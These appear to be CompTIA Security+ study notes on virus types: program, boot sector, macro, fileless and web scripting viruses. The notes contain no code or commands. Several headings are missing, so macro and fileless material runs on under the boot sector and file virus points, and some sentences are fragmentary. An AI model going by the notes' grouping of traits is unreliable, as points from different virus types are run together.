CompTIA Security+: 1.2 Analyze types of attack.
Program Virus (file virus)
- Infects executables
- Program viruses seek out executables or application files to infect.
- if you went and loaded a virus and were able to install itself into your Microsoft Word program, every time you opened up Word you'd be loading that virus again and again.
- And that's why a program virus targets programs.
• Malicious code or program was written to alter the way a computer operates and is designed to spread from one computer to another.
• A virus operates by inserting or attaching itself to a legitimate program or document that supports macros in order to execute its code.
Boot Sector Virus
Boot sector virus:
• Placed in the first hard drive sector
- A boot sector virus is one that's stored in the first sector of a hard drive and is loaded into memory whenever the computer boots up.
- These are actually very difficult to detect because they're installed before the operating system boots up.
• These viruses are once common back when computers are booted from floppy disks.
• Today, these viruses are found distributed in forms of physical media such as external hard drives, USBs or email attachments.
• If the computer is infected with a boot sector virus, it automatically loads into the memory enabling control of your computer.
• When activated, it can infect the system’s master boot record to damage the system.
• Placed into documents
- Macros are a form of code that allows a virus to be embedded inside another document.
- And when that document is opened by the user, that virus then is executed.
- The most common examples of macros are ones that are found inside Word documents or Excel spreadsheets, or PowerPoint presentations.
- By default, macros aren't malicious.
• This type of virus is commonly found in programs such as Microsoft Word or Excel. These viruses are usually stored as part of a document and can spread when the files are transmitted to other computers, often through email attachments.
• A macro virus is written in a macro language used by other software programs, especially Microsoft Excel and Microsoft Word.
• It is transmitted through a phishing email message containing a malicious attachment.
• As users share the infected documents with others, often by forwarding the email, the virus spreads and infects additional devices.
• A virus that attached itself to an executable program.
• It is also called a parasitic virus which typically infects files with .exe or .com extensions.
• Some file infectors can overwrite host files and others can damage your hard drive’s formatting.
• A stealth attack
– Does a good job of avoiding anti-virus detection
• Operates in memory
– But never installed in a file or application
• The user clicks on a malicious website link.
• Website exploits a Flash/Java/Windows vulnerability.
• Launches PowerShell and downloads payload.
• Runs PowerShell scripts and executes in memory.
• Adds an auto-start to the registry.
Appropriately updated with the last signatures can help stop viruses from infecting the systems.
• A very sneaky virus that targets popular websites.
• This sneaky virus disguises itself in the coding of links, ads, images, videos, and site code.
• It can infect systems when users download malicious files or visit malicious websites.
• What this virus does is overwrite code on a website and insert links that can install malicious software on your device.
• Web scripting viruses can steal your cookies and use the information to post on your behalf on the infected website.
– Potentially unwanted programs (PUPs)
– Fileless virus
– Command and control
– Crypto malware
– Logic bombs
– Remote access Trojan (RAT)